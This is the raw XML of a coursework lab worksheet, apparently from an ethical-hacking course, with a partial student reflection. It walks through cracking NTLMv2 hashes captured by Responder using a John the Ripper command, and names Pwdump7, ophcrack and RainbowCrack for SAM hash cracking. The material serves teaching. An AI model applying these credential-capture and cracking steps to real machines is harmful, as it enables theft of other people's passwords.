    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/share/responder/logs/ </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="730" w:right="-15" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The file would be a txt file starting with SMB….NTLM… </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="730" w:right="-15" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Open the file and you could see the hashes  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:right="1960"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4302125" cy="2635250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9239" name="Picture 9239"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="9239" name="Picture 9239"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId50"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4302125" cy="2635250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:right="1960"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="211" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="-15" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Let us use the available tools to crack the hashes </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="213" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="730" w:right="-15" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">John the Ripper 1.9.0-jumbo-1 OMP  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="220" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="730" w:right="3" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-gnu</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 64-bit x86_64 AVX2 AC] </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="217" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="730" w:right="-15" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Copyright (c) 1996-2019 by Solar Designer and others </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="730" w:right="-15" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Homepage: http://www.openwall.com/john/ </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="5" w:line="237" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="-15" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Open Kali Terminal and execute John the Ripper for the file with Hashes </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kali@kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:~$ john /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/share/responder/logs/SMB-NTLMv2-SSP-10.0.2.7.txt  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:right="644"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:right="577"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:position w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4997450" cy="3752850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9367" name="Picture 9367"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="9367" name="Picture 9367"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId51"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4997450" cy="3752850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:ind w:right="644"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9084" w:type="dxa"/>
        <w:tblInd w:w="-29" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="526" w:type="dxa"/>
          <w:left w:w="29" w:type="dxa"/>
          <w:right w:w="27" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9084"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A715A6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9084" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:spacing w:line="234" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Similar to this tool, you could use other existing tools to capture the password in a victim Machine…. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:spacing w:line="234" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Try other methods and record them in your coursework and/or in the shared </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Onenote</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> with instructions to gain CREDITS </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A715A6" w:rsidRPr="00C94921" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="44546A" w:themeColor="text2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C94921">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="44546A" w:themeColor="text2"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Examples (So called hints):  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A715A6" w:rsidRPr="00C94921" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="44546A" w:themeColor="text2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C94921">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="44546A" w:themeColor="text2"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A715A6" w:rsidRPr="00C94921" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:spacing w:line="234" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="44546A" w:themeColor="text2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C94921">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="44546A" w:themeColor="text2"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Crack Security Account Manager hashes using existing tools like Pwdump7 to extract the hashes and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C94921">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="44546A" w:themeColor="text2"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>ophcrack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C94921">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="44546A" w:themeColor="text2"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> tool crack the hashes. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A715A6" w:rsidRPr="00C94921" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="44546A" w:themeColor="text2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C94921">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="44546A" w:themeColor="text2"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00C94921">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="44546A" w:themeColor="text2"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Alternatively, use </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C94921">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="44546A" w:themeColor="text2"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Winrtgen</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C94921">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="44546A" w:themeColor="text2"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C94921">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="44546A" w:themeColor="text2"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>RainbowCrack</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C94921">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="44546A" w:themeColor="text2"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> tool to crack password hashes. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9070" w:type="dxa"/>
        <w:tblInd w:w="-14" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="246" w:type="dxa"/>
          <w:left w:w="14" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7498"/>
        <w:gridCol w:w="1572"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A715A6">
        <w:trPr>
          <w:trHeight w:val="280"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7498" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Record your reflections on gaining the hashes and cracking them</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1572" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w:rsidR="00C416A1" w:rsidRPr="00C416A1" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A715A6">
        <w:trPr>
          <w:trHeight w:val="5244"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7498" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w:rsidR="00C94921" w:rsidRPr="00196FF6" w:rsidRDefault="00C416A1">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00196FF6">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>When utilising john ripper to crack the hash files collected, I was able to see the information of the victim machine, such as</w:t>
            </w:r>
            <w:r w:rsidR="00C94921" w:rsidRPr="00196FF6">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C94921" w:rsidRPr="00196FF6" w:rsidRDefault="00C94921">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C94921" w:rsidRPr="00196FF6" w:rsidRDefault="00C94921" w:rsidP="00C94921">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00196FF6">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>device name</w:t>
            </w:r>
            <w:r w:rsidR="00C416A1" w:rsidRPr="00196FF6">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C94921" w:rsidRPr="00196FF6" w:rsidRDefault="00C416A1" w:rsidP="00C94921">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00196FF6">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">windows </w:t>
            </w:r>
